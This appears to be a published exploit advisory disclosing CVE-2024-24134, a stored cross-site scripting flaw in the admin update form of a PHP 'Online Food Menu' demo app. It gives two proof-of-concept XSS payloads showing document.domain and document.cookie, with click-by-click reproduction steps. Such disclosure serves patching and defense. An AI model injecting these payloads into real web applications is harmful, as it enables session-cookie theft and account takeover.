- Exploit Title: CVE-2024-24134 : Online Food Menu - Cross-Site-Scripting
- Date: 2024-11-01
- Exploit Author: Burak Sevben
- Vendor Homepage: https://www.sourcecodester.com/php/17096/online-food-menu-using-php-and-mysql-source-code.html
- Software Link: https://www.sourcecodester.com/download-code?nid=17096&title=Online+Food+Menu+Using+PHP+and+MySQL+with+Source+Code
- Version: 1.0
- Tested on: Windows 11 Home + PHP 8.2.12, Apache 2.4.58
- Payload 1 :
<video/src=x onerror=alert(document.domain)>
- Payload 2 :
<video/src=x onerror=alert(document.cookie)>
- CVE: CVE-2024-24134
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-24134
- https://www.cve.org/CVERecord?id=CVE-2024-24134
- https://nvd.nist.gov/vuln/detail/CVE-2024-24134
- https://github.com/BurakSevben/CVEs/blob/main/CVE-2024-24134.md
The 'Menu Name' and 'Description' fields in the Update Menu section of localhost/food-menu/admin.php
are vulnerable to cross-site scripting. An attacker could exploit this issue to run arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This could allow the attacker to steal cookie-based authentication credentials and launch other attacks.
- Go to
localhost/food-menu/admin.php
You will see the previously saved data (menus). - To update a random data (one of the menus), select 'Update Menu' A window will appear.
- Enter the following payload in the 'Menu Name' field:
<video/src=x onerror=alert(document.domain)>
- XSS will be triggered as soon as you press the Save Changes button.
- Select a random data (one of the menus) again, select the 'Update Menu' option and enter the following payload in the 'Description' section of the window that appears:
<video/src=x onerror=alert(document.cookie)>
- XSS will be triggered as soon as you press the Save Changes button.